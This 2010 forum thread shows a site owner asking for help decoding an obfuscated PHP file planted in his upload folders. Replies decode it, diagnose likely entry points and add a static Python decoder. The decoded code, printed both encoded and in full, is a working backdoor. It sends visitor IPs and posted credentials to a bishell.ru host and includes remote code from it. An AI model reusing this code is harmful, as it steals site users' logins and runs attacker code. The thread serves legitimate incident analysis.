
Help in decoding XSS Script

Posted: Tue Aug 10, 2010 12:51 am
by prasant4u
A few days ago my forum had an XSS attack.. I found a .htaccess and two randomly named PHP files (like base.php, create.php) injected into every one of my 777 upload folders... I am curious to know what code they used.. can someone decode this code please? Thanks in advance.

Code:

<?php error_reporting(0);$p="bfdhgzzazbzej";eval(base64_decode("Y2xhc3MgbmV3aHR0cHsNCnZhciAkZnVsbHVybDsgdmFyICRwX3VybDsgdmFyICRjb25uX2lkOyB2YXIgJGZsdXNoZWQ7IHZhciAkbW9kZSA9IDQ7IHZhciAkZGVmbW9kZTsgdmFyICRyZWRpcmVjdHMgPSAwOyB2YXIgJGJpbmFyeTsgdmFyICRvcHRpb25zOyB2YXIgJHN0YXQgPSBhcnJheSgnZGV2JyA9PiAwLCdpbm8nID0+IDAsJ21vZGUnID0+IDAsJ25saW5rJyA9PiAxLCd1aWQnID0+IDAsJ2dpZCcgPT4gMCwncmRldicgPT4gLTEsJ3NpemUnID0+IDAsJ2F0aW1lJyA9PiAwLCdtdGltZScgPT4gMCwnY3RpbWUnID0+IDAsJ2Jsa3NpemUnID0+IC0xLCdibG9ja3MnID0+IDApOw0KZnVuY3Rpb24gZXJyb3IoJG1zZz0nbm90IGNvbm5lY3RlZCcpIHsgaWYgKCR0aGlzLT5vcHRpb25zICYgU1RSRUFNX1JFUE9SVF9FUlJPUlMpIHsgdHJpZ2dlcl9lcnJvcigkbXNnLCBFX1VTRVJfV0FSTklORyk7IH0gcmV0dXJuIGZhbHNlOyB9DQpmdW5jdGlvbiBzdHJlYW1fb3BlbigkcGF0aCwgJG1vZGUsICRvcHRpb25zLCAkb3BlbmVkX3BhdGgpIHsgJHRoaXMtPmZ1bGx1cmwgPSAkcGF0aDsgJHRoaXMtPm9wdGlvbnMgPSAkb3B0aW9uczsgJHRoaXMtPmRlZm1vZGUgPSAkbW9kZTsgJHVybCA9IHBhcnNlX3VybCgkcGF0aCk7IGlmIChlbXB0eSgkdXJsWydob3N0J10pKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoJ21pc3NpbmcgaG9zdCBuYW1lJyk7IH0gJHRoaXMtPmNvbm5faWQgPSBmc29ja29wZW4oJHVybFsnaG9zdCddLCAoZW1wdHkoJHVybFsncG9ydCddKSA/IDgwIDogaW50dmFsKCR1cmxbJ3BvcnQnXSkpLCAkZXJybm8sICRlcnJzdHIsIDIpOyBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoZW1wdHkoJHVybFsncGF0aCddKSkgeyAkdXJsWydwYXRoJ10gPSAnLyc7IH0gJHRoaXMtPnBfdXJsID0gJHVybDsgJHRoaXMtPmZsdXNoZWQgPSBmYWxzZTsgaWYgKCRtb2RlWzBdICE9ICdyJyB8fCAoc3RycG9zKCRtb2RlLCAnKycpICE9PSBmYWxzZSkpIHsgJHRoaXMtPm1vZGUgKz0gMjsgfSAkdGhpcy0+YmluYXJ5ID0gKHN0cnBvcygkbW9kZSwgJ2InKSAhPT0gZmFsc2UpOyAkYyA9ICR0aGlzLT5jb250ZXh0KCk7IGlmICghaXNzZXQoJGNbJ21ldGhvZCddKSkgeyBzdHJlYW1fY29udGV4dF9zZXRfb3B0aW9uKCR0aGlzLT5jb250ZXh0LCAnaHR0cCcsICdtZXRob2QnLCAnR0VUJyk7IH0gaWYgKCFpc3NldCgkY1snaGVhZGVyJ10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ2hlYWRlcicsICcnKTsgfSBpZiAoIWlzc2V0KCRjWyd1c2VyX2FnZW50J10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ3VzZXJfYWdlbnQnLCBpbmlfZ2V0KCd1c2VyX2FnZW50JykpOyB9IGlmICghaXNzZXQoJGNbJ2NvbnRlbnQnXSkpIHsgc3RyZWFtX2NvbnRl
eHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnY29udGVudCcsICcnKTsgfSBpZiAoIWlzc2V0KCRjWydtYXhfcmVkaXJlY3RzJ10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ21heF9yZWRpcmVjdHMnLCA1KTsgfSByZXR1cm4gdHJ1ZTsgfQ0KZnVuY3Rpb24gc3RyZWFtX2Nsb3NlKCkgeyBpZiAoJHRoaXMtPmNvbm5faWQpIHsgZmNsb3NlKCR0aGlzLT5jb25uX2lkKTsgJHRoaXMtPmNvbm5faWQgPSBudWxsOyB9IH0NCmZ1bmN0aW9uIHN0cmVhbV9yZWFkKCRieXRlcykgeyBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoKTsgfSBpZiAoISR0aGlzLT5mbHVzaGVkICYmICEkdGhpcy0+c3RyZWFtX2ZsdXNoKCkpIHsgcmV0dXJuIGZhbHNlOyB9IGlmIChmZW9mKCR0aGlzLT5jb25uX2lkKSkgeyByZXR1cm4gJyc7IH0gJGJ5dGVzID0gbWF4KDEsJGJ5dGVzKTsgaWYgKCR0aGlzLT5iaW5hcnkpIHsgcmV0dXJuIGZyZWFkKCR0aGlzLT5jb25uX2lkLCAkYnl0ZXMpOyB9IGVsc2UgeyByZXR1cm4gZmdldHMoJHRoaXMtPmNvbm5faWQsICRieXRlcyk7IH0gfQ0KZnVuY3Rpb24gc3RyZWFtX3dyaXRlKCRkYXRhKSB7IGlmICghJHRoaXMtPmNvbm5faWQpIHsgcmV0dXJuICR0aGlzLT5lcnJvcigpOyB9IGlmICghJHRoaXMtPm1vZGUgJiAyKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoJ1N0cmVhbSBpcyBpbiByZWFkLW9ubHkgbW9kZScpOyB9ICRjID0gJHRoaXMtPmNvbnRleHQoKTsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnbWV0aG9kJywgKCgkdGhpcy0+ZGVmbW9kZVswXSA9PSAneCcpID8gJ1BVVCcgOiAnUE9TVCcpKTsgaWYgKHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ2NvbnRlbnQnLCAkY1snY29udGVudCddLiRkYXRhKSkgeyByZXR1cm4gc3RybGVuKCRkYXRhKTsgfSByZXR1cm4gMDsgfQ0KZnVuY3Rpb24gc3RyZWFtX2VvZigpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gdHJ1ZTsgfSBpZiAoISR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSByZXR1cm4gZmVvZigkdGhpcy0+Y29ubl9pZCk7IH0NCmZ1bmN0aW9uIHN0cmVhbV9zZWVrKCRvZmZzZXQsICR3aGVuY2UpIHsgcmV0dXJuIGZhbHNlOyB9DQpmdW5jdGlvbiBzdHJlYW1fdGVsbCgpIHsgcmV0dXJuIDA7IH0NCmZ1bmN0aW9uIHN0cmVhbV9mbHVzaCgpIHsgaWYgKCR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoKTsgfSAkYyA9ICR0aGlzLT5jb250ZXh0KCk7ICR0aGlzLT5mbHVzaGVkID0gdHJ1ZTsgJFJlcXVlc3RIZWFkZXJzID0gYXJyYXkoJGNbJ21ldGhvZCddLicgJy4kdGhpcy0+cF91cmxbJ3BhdGgnXS4oZW1wdHkoJHRoaXMtPnBfdXJsWydxdWVyeSddKSA/ICcnIDog
Jz8nLiR0aGlzLT5wX3VybFsncXVlcnknXSkuJyBIVFRQLzEuMCcsICdIT1NUOiAnLiR0aGlzLT5wX3VybFsnaG9zdCddLCAnVXNlci1BZ2VudDogJy4kY1sndXNlcl9hZ2VudCddLicgU3RyZWFtUmVhZGVyJyApOyBpZiAoIWVtcHR5KCRjWydoZWFkZXInXSkpIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAkY1snaGVhZGVyJ107IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSkgeyBpZiAoJGNbJ21ldGhvZCddID09ICdQVVQnKSB7ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtVHlwZTogJy4oJHRoaXMtPmJpbmFyeSA/ICdhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0nIDogJ3RleHQvcGxhaW4nKTsgfSBlbHNlIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAnQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnOyB9ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtTGVuZ3RoOiAnLnN0cmxlbigkY1snY29udGVudCddKTsgfSAkUmVxdWVzdEhlYWRlcnNbXSA9ICdDb25uZWN0aW9uOiBjbG9zZSc7IGlmIChmd3JpdGUoJHRoaXMtPmNvbm5faWQsIGltcGxvZGUoIlxyXG4iLCAkUmVxdWVzdEhlYWRlcnMpLiJcclxuXHJcbiIpID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSAmJiBmd3JpdGUoJHRoaXMtPmNvbm5faWQsICRjWydjb250ZW50J10pID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gZ2xvYmFsICRodHRwX3Jlc3BvbnNlX2hlYWRlcjsgJGh0dHBfcmVzcG9uc2VfaGVhZGVyID0gZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCk7ICRkYXRhID0gcnRyaW0oJGh0dHBfcmVzcG9uc2VfaGVhZGVyKTsgcHJlZ19tYXRjaCgnIy4qIChbMC05XSspICguKikjaScsICRkYXRhLCAkaGVhZCk7IGlmICgoJGhlYWRbMV0gPj0gMzAxICYmICRoZWFkWzFdIDw9IDMwMykgfHwgJGhlYWRbMV0gPT0gMzA3KSB7ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCkpOyB3aGlsZSAoIWVtcHR5KCRkYXRhKSkgeyBpZiAoc3RycG9zKCRkYXRhLCAnTG9jYXRpb246ICcpICE9PSBmYWxzZSkgeyAkbmV3X2xvY2F0aW9uID0gdHJpbShzdHJfcmVwbGFjZSgnTG9jYXRpb246ICcsICcnLCAkZGF0YSkpOyBicmVhazsgfSAkZGF0YSA9IHJ0cmltKGZnZXRzKCR0aGlzLT5jb25uX2lkLCAzMDApKTsgfSB0cmlnZ2VyX2Vycm9yKCR0aGlzLT5mdWxsdXJsLicgJy4kaGVhZFsyXS4nOiAnLiRuZXdfbG9jYXRpb24sIEVfVVNFUl9OT1RJQ0UpOyAkdGhpcy0+c3RyZWFtX2Nsb3NlKCk7IHJldHVybiAoJGNbJ21heF9yZWRpcmVjdHMnXSA+ICR0aGlzLT5yZWRpcmVjdHMrKyAmJiAkdGhpcy0+c3RyZWFtX29wZW4oJG5ld19sb2NhdGlvbiwgJHRoaXMtPmRlZm1vZGUsICR0aGlzLT5vcHRpb25zLCBudWxsKSAmJiAkdGhpcy0+c3RyZWFtX2ZsdXNoKCkpOyB9ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDEwMjQpKTsgd2hpbGUgKCFlbXB0eSgkZGF0
YSkpIHsgJGh0dHBfcmVzcG9uc2VfaGVhZGVyIC49ICRkYXRhLiJcclxuIjsgaWYgKHN0cnBvcygkZGF0YSwnQ29udGVudC1MZW5ndGg6ICcpICE9PSBmYWxzZSkgeyAkdGhpcy0+c3RhdFsnc2l6ZSddID0gdHJpbShzdHJfcmVwbGFjZSgnQ29udGVudC1MZW5ndGg6ICcsICcnLCAkZGF0YSkpOyB9IGVsc2VpZiAoc3RycG9zKCRkYXRhLCdEYXRlOiAnKSAhPT0gZmFsc2UpIHsgJHRoaXMtPnN0YXRbJ2F0aW1lJ10gPSBzdHJ0b3RpbWUoc3RyX3JlcGxhY2UoJ0RhdGU6ICcsICcnLCAkZGF0YSkpOyB9IGVsc2VpZiAoc3RycG9zKCRkYXRhLCdMYXN0LU1vZGlmaWVkOiAnKSAhPT0gZmFsc2UpIHsgJHRoaXMtPnN0YXRbJ210aW1lJ10gPSBzdHJ0b3RpbWUoc3RyX3JlcGxhY2UoJ0xhc3QtTW9kaWZpZWQ6ICcsICcnLCAkZGF0YSkpOyB9ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDEwMjQpKTsgfSBpZiAoJGhlYWRbMV0gPj0gNDAwKSB7IHRyaWdnZXJfZXJyb3IoJHRoaXMtPmZ1bGx1cmwuJyAnLiRoZWFkWzJdLCBFX1VTRVJfV0FSTklORyk7IHJldHVybiBmYWxzZTsgfSBpZiAoJGhlYWRbMV0gPT0gMzA0KSB7IHRyaWdnZXJfZXJyb3IoJHRoaXMtPmZ1bGx1cmwuJyAnLiRoZWFkWzJdLCBFX1VTRVJfTk9USUNFKTsgcmV0dXJuIGZhbHNlOyB9IHJldHVybiB0cnVlOyB9DQpmdW5jdGlvbiBzdHJlYW1fc3RhdCgpIHsgJHRoaXMtPnN0cmVhbV9mbHVzaCgpOyByZXR1cm4gJHRoaXMtPnN0YXQ7IH0NCmZ1bmN0aW9uIGRpcl9vcGVuZGlyKCRwYXRoLCAkb3B0aW9ucykgeyByZXR1cm4gZmFsc2U7IH0NCmZ1bmN0aW9uIGRpcl9yZWFkZGlyKCkgeyByZXR1cm4gJyc7IH0NCmZ1bmN0aW9uIGRpcl9yZXdpbmRkaXIoKSB7IHJldHVybiAnJzsgfQ0KZnVuY3Rpb24gZGlyX2Nsb3NlZGlyKCkgeyByZXR1cm47IH0NCmZ1bmN0aW9uIHVybF9zdGF0KCRwYXRoLCAkZmxhZ3MpIHsgcmV0dXJuIGFycmF5KCk7IH0NCmZ1bmN0aW9uIGNvbnRleHQoKSB7IGlmICghJHRoaXMtPmNvbnRleHQpIHsgJHRoaXMtPmNvbnRleHQgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoKTsgfSAkYyA9IHN0cmVhbV9jb250ZXh0X2dldF9vcHRpb25zKCR0aGlzLT5jb250ZXh0KTsgcmV0dXJuIChpc3NldCgkY1snaHR0cCddKSA/ICRjWydodHRwJ10gOiBhcnJheSgpKTsgfQ0KfWlmKGlzc2V0KCRfUE9TVFsibCJdKSBhbmQgaXNzZXQoJF9QT1NUWyJwIl0pKXtpZihpc3NldCgkX1BPU1RbImlucHV0Il0pKXskdXNlcl9hdXRoPSImbD0iLmJhc2U2NF9lbmNvZGUoJF9QT1NUWyJsIl0pLiImcD0iLmJhc2U2NF9lbmNvZGUobWQ1KCRfUE9TVFsicCJdKSk7fWVsc2V7JHVzZXJfYXV0aD0iJmw9Ii4kX1BPU1RbImwiXS4iJnA9Ii4kX1BPU1RbInAiXTt9fWVsc2V7JHVzZXJfYXV0aD0iIjt9aWYoIWlzc2V0KCRfUE9TVFsibG9nX2ZsZyJdKSl7JGxvZ19mbGc9IiZsb2ciO30NCiRya2h0PTE7aWYodmVyc2lvbl9jb21wYXJlKFBIUF9WRVJTSU9OLCc1LjInLCc+PScpKXtpZihp
bmlfZ2V0KCdhbGxvd191cmxfaW5jbHVkZScpKXskcmtodD0xO31lbHNleyRya2h0PTA7fX0NCmlmKCRya2h0PT0xKXtpZihpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSl7JHJraHQ9MTt9ZWxzZXskcmtodD0wO319DQokdj0kcC5iYXNlNjRfZGVjb2RlKCJMblZ6WlhKekxtSnBjMmhsYkd3dWNuVT0iKS4iLz9yX2FkZHI9Ii5zcHJpbnRmKCIldSIsIGlwMmxvbmcoZ2V0ZW52KCJSRU1PVEVfQUREUiIpKSkuIiZ1cmw9Ii5iYXNlNjRfZW5jb2RlKCRfU0VSVkVSWyJTRVJWRVJfTkFNRSJdLiRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdKS4kdXNlcl9hdXRoLiRsb2dfZmxnOw0KaWYoJHJraHQ9PTEpe2lmKCFAaW5jbHVkZV9vbmNlKGJhc2U2NF9kZWNvZGUoImFIUjBjRG92THc9PSIpLiR2KSl7fX0NCmVsc2V7c3RyZWFtX3dyYXBwZXJfcmVnaXN0ZXIoJ2h0dHAyJywnbmV3aHR0cCcpO2lmKCFAaW5jbHVkZV9vbmNlKGJhc2U2NF9kZWNvZGUoImFIUjBjREk2THk4PSIpLiR2KSl7fX0=")); ?>

Re: Help in decoding XSS Script

Posted: Tue Aug 10, 2010 12:56 am
by Mordred
Simple: replace eval with print
Also, this is not XSS, it's either compromised FTP or a compromised upload script.
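A static way to do that decoding without running any of the dropper's PHP, as an added example that is not part of this thread (Python; the regexes, the triage() helper and the constructed sample dropper, which reuses the $p prefix and the three base64 literals posted above, are all mine):

```python
# Static triage of an eval(base64_decode("...")) PHP dropper: nothing is executed.
# Added example, not the thread's own code; regexes and helpers are mine.
import base64
import re

# Constructed sample with the dropper's shape; the $p prefix and the three base64
# literals are the ones posted in the thread.
SAMPLE_INNER = (
    '$v=$p.base64_decode("LnVzZXJzLmJpc2hlbGwucnU=")."/?r_addr=".$_SERVER["REMOTE_ADDR"];'
    'if($rkht==1){@include_once(base64_decode("aHR0cDovLw==").$v);}'
    "else{stream_wrapper_register('http2','newhttp');"
    '@include_once(base64_decode("aHR0cDI6Ly8=").$v);}'
)
SAMPLE_DROPPER = ('<?php error_reporting(0);$p="bfdhgzzazbzej";eval(base64_decode("'
                  + base64.b64encode(SAMPLE_INNER.encode()).decode() + '")); ?>')

EVAL_B64 = re.compile(r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=\s]+)["\']\s*\)\s*\)')
B64_LITERAL = re.compile(r'base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
PREFIX = re.compile(r'\$p\s*=\s*["\']([^"\']*)["\']')
HOST_SUFFIX = re.compile(r'\$v\s*=\s*\$p\s*\.\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')

def _b64(s: str) -> str:
    # latin-1 never raises, so binary junk in a payload still comes out readable
    return base64.b64decode(re.sub(r"\s+", "", s)).decode("latin-1")

def unwrap_eval(src: str, max_layers: int = 5) -> str:
    """Peel nested eval(base64_decode("...")) layers; src comes back unchanged if there are none."""
    for _ in range(max_layers):
        m = EVAL_B64.search(src)
        if not m:
            break
        src = _b64(m.group(1))
    return src

def triage(src: str) -> dict:
    """Decode the payload and pull out what an incident responder wants to see first."""
    payload = unwrap_eval(src)
    prefix = PREFIX.search(src)
    suffix = HOST_SUFFIX.search(payload)  # the $v = $p . base64_decode(...) line
    return {
        "payload": payload,
        "prefix": prefix.group(1) if prefix else None,
        "literals": [_b64(s) for s in B64_LITERAL.findall(payload)],
        "beacon_host": (prefix.group(1) if prefix else "") + (_b64(suffix.group(1)) if suffix else ""),
        "has_wrapper_fallback": "stream_wrapper_register" in payload,
    }

if __name__ == "__main__":
    result = triage(SAMPLE_DROPPER)
    print("beacon host:", result["beacon_host"])
    print("decoded literals:", result["literals"])
    print("custom stream-wrapper fallback:", result["has_wrapper_fallback"])
```

Point triage() at the contents of a suspicious file instead of SAMPLE_DROPPER; the beacon host and the wrapper fallback are the two facts to write down before cleaning up.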

Re: Help in decoding XSS Script

Posted: Tue Aug 10, 2010 1:14 am
by prasant4u
Thanks for your reply.. so does this mean they got my FTP details? Now I've moved from mod_php to FCGI (with Apache suexec enabled), so now my upload folders have 755 permission. Could only 777 folders have this type of security problem?

If possible, please decode some lines for me... I can't get it...

Re: Help in decoding XSS Script

Posted: Thu Aug 12, 2010 2:36 pm
by Sephern

Code:

<?php
// Outer wrapper kept from the original file: it silences errors and sets the $p prefix used in $v below.
error_reporting(0);
$p = "bfdhgzzazbzej";
class newhttp{
var $fullurl;
var $p_url; 
var $conn_id; 
var $flushed; 
var $mode = 4; 
var $defmode; 
var $redirects = 0; 
var $binary; 
var $options; 
var $stat = array('dev' => 0,'ino' => 0,'mode' => 0,'nlink' => 1,'uid' => 0,'gid' => 0,'rdev' => -1,'size' => 0,'atime' => 0,'mtime' => 0,'ctime' => 0,'blksize' => -1,'blocks' => 0);
function error($msg='not connected') { 
	if ($this->options & STREAM_REPORT_ERRORS)
	{ 
		trigger_error($msg, E_USER_WARNING);
	}
	return false;
}
function stream_open($path, $mode, $options, $opened_path) { 
	$this->fullurl = $path; 
	$this->options = $options; 
	$this->defmode = $mode; 
	$url = parse_url($path); 
	if (empty($url['host'])) 
	{
		return $this->error('missing host name');
 	}
	$this->conn_id = fsockopen($url['host'], (empty($url['port']) ? 80 : intval($url['port'])), $errno, $errstr, 2);
	if (!$this->conn_id)
	{
		return false;
	}
	if (empty($url['path'])) 
	{ 
		$url['path'] = '/';
	}
	$this->p_url = $url;
	$this->flushed = false;
	if ($mode[0] != 'r' || (strpos($mode, '+') !== false))
	{ 
		$this->mode += 2;
	}
	$this->binary = (strpos($mode, 'b') !== false); 
	$c = $this->context(); 
	if (!isset($c['method'])) 
	{ 
		stream_context_set_option($this->context, 'http', 'method', 'GET');
	}
	if (!isset($c['header']))
	{ 
		stream_context_set_option($this->context, 'http', 'header', '');
	} 
	if (!isset($c['user_agent'])) 
	{ 
		stream_context_set_option($this->context, 'http', 'user_agent', ini_get('user_agent'));
 	} 
	if (!isset($c['content'])) 
	{
		stream_context_set_option($this->context, 'http', 'content', ''); 
	} 
	if (!isset($c['max_redirects'])) 
	{ 
		stream_context_set_option($this->context, 'http', 'max_redirects', 5); 
	} 
	return true; 
}
function stream_close() {
	if ($this->conn_id) 
	{
		fclose($this->conn_id); 
		$this->conn_id = null;
 	} 
}
function stream_read($bytes) { 
	if (!$this->conn_id) 
	{ 
		return $this->error(); 
	} 
	if (!$this->flushed && !$this->stream_flush()) 
	{ 
		return false;
	} 
	if (feof($this->conn_id)) 
	{ 
		return ''; 
	}
	$bytes = max(1,$bytes);
	if ($this->binary) 
	{ 
		return fread($this->conn_id, $bytes); 
	} 
	else 
	{ 
		return fgets($this->conn_id, $bytes); 
	} 
}
function stream_write($data) { 
	if (!$this->conn_id) 
	{ 
		return $this->error();
	} 
	if (!$this->mode & 2) // ! binds tighter than &, so this tests (!$this->mode) & 2 and never fires; bug kept from the original
	{ 
		return $this->error('Stream is in read-only mode'); 
	} 
	$c = $this->context(); 
	stream_context_set_option($this->context, 'http', 'method', (($this->defmode[0] == 'x') ? 'PUT' : 'POST'));
	if (stream_context_set_option($this->context, 'http', 'content', $c['content'].$data)) 
	{ 
		return strlen($data);
	} 
	return 0; 
}
function stream_eof() { 
	if (!$this->conn_id) 
	{ 
		return true; 
	} 
	if (!$this->flushed) 
	{ 
		return false;
	} 
	return feof($this->conn_id);
}
function stream_seek($offset, $whence) { //lolwut? Bit of a pointless function? ~Sephern 
	return false; 
}
function stream_tell() { 
	return 0; 
}
function stream_flush() { 
	if ($this->flushed) 
	{ 
		return false; 
	} 
	if (!$this->conn_id) 
	{ 
		return $this->error(); 
	} 
	$c = $this->context();
	$this->flushed = true; 
	$RequestHeaders = array($c['method'].' '.$this->p_url['path'].(empty($this->p_url['query']) ? '' : '?'.$this->p_url['query']).' HTTP/1.0', 'HOST: '.$this->p_url['host'], 'User-Agent: '.$c['user_agent'].' StreamReader' );
	if (!empty($c['header'])) 
	{ 
		$RequestHeaders[] = $c['header'];
	} 
	if (!empty($c['content'])) 
	{ 
		if ($c['method'] == 'PUT') 
		{ 
			$RequestHeaders[] = 'Content-Type: '.($this->binary ? 'application/octet-stream' : 'text/plain');
		} 
		else 
		{ 
			$RequestHeaders[] = 'Content-Type: application/x-www-form-urlencoded';
		} 
		$RequestHeaders[] = 'Content-Length: '.strlen($c['content']);
	}
	$RequestHeaders[] = 'Connection: close';
	if (fwrite($this->conn_id, implode("\r\n", $RequestHeaders)."\r\n\r\n") === false)
	{
		return false;
	}
	if (!empty($c['content']) && fwrite($this->conn_id, $c['content']) === false)
	{
		return false;
	}
	global $http_response_header;
	$http_response_header = fgets($this->conn_id, 300);
	$data = rtrim($http_response_header);
	preg_match('#.* ([0-9]+) (.*)#i', $data, $head);
	if (($head[1] >= 301 && $head[1] <= 303) || $head[1] == 307)
	{
		$data = rtrim(fgets($this->conn_id, 300));
		while (!empty($data))
		{
			if (strpos($data, 'Location: ') !== false)
			{
				$new_location = trim(str_replace('Location: ', '', $data));
				break;
			}
			$data = rtrim(fgets($this->conn_id, 300));
		}
		trigger_error($this->fullurl.' '.$head[2].': '.$new_location, E_USER_NOTICE);
		$this->stream_close();
		return ($c['max_redirects'] > $this->redirects++ && $this->stream_open($new_location, $this->defmode, $this->options, null) && $this->stream_flush());
	}
	$data = rtrim(fgets($this->conn_id, 1024));
	while (!empty($data))
	{
		$http_response_header .= $data."\r\n";
		if (strpos($data,'Content-Length: ') !== false)
		{
			$this->stat['size'] = trim(str_replace('Content-Length: ', '', $data));
		}
		elseif (strpos($data,'Date: ') !== false)
		{
			$this->stat['atime'] = strtotime(str_replace('Date: ', '', $data));
		}
		elseif (strpos($data,'Last-Modified: ') !== false)
		{
			$this->stat['mtime'] = strtotime(str_replace('Last-Modified: ', '', $data));
		}
		$data = rtrim(fgets($this->conn_id, 1024));
	}
	if ($head[1] >= 400)
	{
		trigger_error($this->fullurl.' '.$head[2], E_USER_WARNING);
		return false;
	}
	if ($head[1] == 304)
	{
		trigger_error($this->fullurl.' '.$head[2], E_USER_NOTICE);
		return false;
	}
	return true;
}
function stream_stat() {
	$this->stream_flush();
	return $this->stat;
}
function dir_opendir($path, $options) {
	return false;
}
function dir_readdir() {
	return '';
}
function dir_rewinddir() {
	return '';
}
function dir_closedir() {
	return;
}
function url_stat($path, $flags) {
	return array();
}
function context() {
	if (!$this->context)
	{
		$this->context = stream_context_create();
	}
	$c = stream_context_get_options($this->context);
	return (isset($c['http']) ? $c['http'] : array());
}
} // end of class newhttp; in the original the class closes right before the $_POST handling below
if(isset($_POST["l"]) and isset($_POST["p"]))
{
	if(isset($_POST["input"]))
	{
		$user_auth="&l=".base64_encode($_POST["l"])."&p=".base64_encode(md5($_POST["p"]));
	}
	else
	{
		$user_auth="&l=".$_POST["l"]."&p=".$_POST["p"];
	}
}
else
{
	$user_auth="";
}
if(!isset($_POST["log_flg"]))
{
	$log_flg="&log";
}
$rkht=1; // stays 1 only if allow_url_include (checked on PHP >= 5.2) and allow_url_fopen are both enabled
if(version_compare(PHP_VERSION,'5.2','>='))
{
	if(ini_get('allow_url_include'))
	{
		$rkht=1;
	}
	else
	{
		$rkht=0;
	}
}
if($rkht==1)
{
	if(ini_get('allow_url_fopen'))
	{
		$rkht=1;
	}
	else
	{
		$rkht=0;
	}
}
// "LnVzZXJzLmJpc2hlbGwucnU=" decodes to ".users.bishell.ru", so $v is "<$p>.users.bishell.ru/?r_addr=<client IP as integer>&url=<base64 of host+URI>" plus the optional l/p and log flags
$v=$p.base64_decode("LnVzZXJzLmJpc2hlbGwucnU=")."/?r_addr=".sprintf("%u", ip2long(getenv("REMOTE_ADDR")))."&url=".base64_encode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]).$user_auth.$log_flg;
if($rkht==1)
{
	if(!@include_once(base64_decode("aHR0cDovLw==").$v)) // "aHR0cDovLw==" decodes to "http://": plain remote include of the beacon URL
	{
	}
}
else
{
	stream_wrapper_register('http2','newhttp'); // fallback when allow_url_include/allow_url_fopen are off: fetch through the raw-socket class above
	if(!@include_once(base64_decode("aHR0cDI6Ly8=").$v)) // "aHR0cDI6Ly8=" decodes to "http2://", i.e. the wrapper just registered
	{
	}
}
?>
Decoded and tabulated for your viewing pleasure.

It would appear to be a shell script, which has taken advantage of an LFI vulnerability in your website.
@Mordred, while this is probably the most likely conclusion, there are other ways of exploiting file inclusion vulnerabilities.

Re: Help in decoding XSS Script

Posted: Fri Aug 13, 2010 1:52 am
by Mordred
Sephern wrote: It would appear to be a shell script, which has taken advantage of an LFI vulnerability in your website.
@Mordred, while this is probably the most likely conclusion, there are other ways of exploiting file inclusion vulnerabilities.
Agreed, I did not mean that these are all the possibilities.
The script, BTW, looks like it wants to do an RFI, but nothing in it explains how it appeared on the server, so LFI is not a final diagnosis either.

Re: Help in decoding XSS Script

Posted: Sat Aug 14, 2010 12:12 am
by prasant4u
Thanks everyone for your help.. :) I've disabled the url_include function on the server.

Re: Help in decoding XSS Script

Posted: Sun Aug 15, 2010 10:12 am
by Sephern
Mordred wrote:
Sephern wrote: It would appear to be a shell script, which has taken advantage of an LFI vulnerability in your website.
@Mordred, while this is probably the most likely conclusion, there are other ways of exploiting file inclusion vulnerabilities.
Agreed, I did not mean that these are all the possibilities.
The script, BTW, looks like it wants to do an RFI, but nothing in it explains how it appeared on the server, so LFI is not a final diagnosis either.
Thanks for your reply.. so does this mean they got my FTP details? Now I've moved from mod_php to FCGI (with Apache suexec enabled), so now my upload folders have 755 permission. Could only 777 folders have this type of security problem?
755 is read and execute, is it not?
If files from the 'upload' folder are included and had PHP code in them, then it'd explain how it was shell'd.

Re: Help in decoding XSS Script

Posted: Mon Aug 16, 2010 3:28 am
by Mordred
I didn't say your diagnosis was wrong, only that it wasn't the only possible one.